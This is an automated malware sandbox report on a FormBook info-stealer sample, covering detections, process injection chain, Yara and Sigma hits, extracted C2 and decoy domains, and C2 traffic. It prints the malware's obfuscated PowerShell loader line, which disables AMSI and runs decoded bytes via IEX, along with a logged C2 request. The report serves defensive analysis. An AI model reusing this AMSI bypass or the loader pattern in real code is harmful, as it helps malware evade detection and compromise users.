Windows Analysis Report s2rsXUiUn8

Overview

General Information

Sample Name: s2rsXUiUn8 (renamed file extension from none to exe)
Analysis ID: 452684
MD5: f5041ec4ce468a07ecbfd076bc0f879b
SHA1: bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256: caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Tags: exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • s2rsXUiUn8.exe (PID: 4440 cmdline: 'C:\Users\user\Desktop\s2rsXUiUn8.exe' MD5: F5041EC4CE468A07ECBFD076BC0F879B)
    • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5116 cmdline: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(<encoded byte array omitted>);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
      • calc.exe (PID: 5856 cmdline: {path} MD5: 0975EE4BD09E87C94861F69E4AA44B7A)
        • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 3552 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
            • cmd.exe (PID: 4344 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
9.2.calc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.calc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.calc.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
9.2.calc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.calc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Suspicious PowerShell Command Line
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community | Data: Command: see the powershell.exe command line in the Process Tree (PID 5116)
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: see the powershell.exe command line in the Process Tree (PID 5116)

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: s2rsXUiUn8.exe | Metadefender: Detection: 17%
Source: s2rsXUiUn8.exe | ReversingLabs: Detection: 57%
Yara detected FormBook
Source: Yara match | File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY
Source: 9.2.calc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: calc.exe, help.exe
Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\calc.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\calc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.homekeycap.com/pjje/
Source: global traffic | HTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1 | Host: www.rajuherbalandspicegarden.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 162.159.134.233
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1 | Host: www.rajuherbalandspicegarden.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: google.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Very long command line found
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Process created: Commandline size = 4201
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exe | Process created: Commandline size = 4201
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E00 NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E80 NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419DFB NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E4A NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00419E7A NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9FE0 NtCreateMutant,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_033E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02ACAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_02AC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E00 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E80 NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9DFB NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E4A NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 19_2_001B9E7A NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041D84E
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_0041E066
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 9_2_00401030
